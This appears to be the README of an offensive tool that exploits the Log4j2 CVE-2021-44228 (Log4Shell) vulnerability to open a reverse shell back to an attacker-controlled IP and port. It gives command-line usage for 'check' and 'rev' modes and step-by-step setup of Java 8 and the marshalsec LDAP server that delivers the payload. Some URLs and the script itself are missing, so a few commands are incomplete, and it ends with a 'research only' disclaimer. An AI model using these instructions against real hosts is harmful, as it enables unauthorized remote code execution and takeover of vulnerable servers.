# Log4j2-CVE-2021-44228-revshell

## Usage

    For reverse shell:
    $~ python3 -M rev -u -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]
    For check exploitable:
    $~ python3 -M check -u -l [AttackerIP] -p [AttackerPort]

    $~  python3 -h
        usage: [-h] -M MODE -u TARGET -l LHOST -p LPORT
                                  [-hp HTTPPORT] [-V]

        Log4j2 CVE-2021-44228 Reverse Shell

        optional arguments:
          -h, --help            show this help message and exit
          -M MODE, --mode MODE  Mode: check | rev
          -u TARGET, --target TARGET
                                Target full URL,
          -l LHOST, --lhost LHOST
                                Attacker IP for receive revshell
          -p LPORT, --lport LPORT
                                Attacker port for receive revshell
          -hp HTTPPORT, --httpport HTTPPORT
                                HTTP server port on attacker host, default is 8888
          -V, --version         show program's version number and exit

## Requirement
    1. Marshalsec jndi.LDAPRefServer # see here,
    2. Java 8 # you can get Java 8 here, 
       suggested to install jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181]
    3. This script,

## TLDR; Guided step
    $ Open browser and Download Java 8 from 
      In Java SE Development Kit 8u181 section, select jdk-8u181-linux-x64.tar.gz or appropriate package based on your OS.
    $ sudo mkdir /usr/lib/jvm #Make this dir if you do not have yet
    $ cd /usr/lib/jvm
    $ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz #Extract downloaded jdk-8u181-linux-x64.tar.gz into /usr/lib/jvm
    $ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
    $ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
    $ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

    $ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
    $ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
    $ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
    $ java -version #verify if you are running Java 1.8.0_181
    $ git clone /tmp/Log4j2-dir; cd /tmp/Log4j2-dir #Install marshalsec jndi.LDAPRefServer
    $ sudo apt install -y maven #Build marshalsec with the Java builder maven. If you do not have maven, please install first
    $ mvn clean package -DskipTests #Build marshalsec tool with maven 
    $ cd /tmp/Log4j2-dir; wget -q
    $ python3 -M rev -u -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

## PoC

    target host:
    attacker host:

## Tested on
    - Ubuntu 18.04

## Disclaimer:

    The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities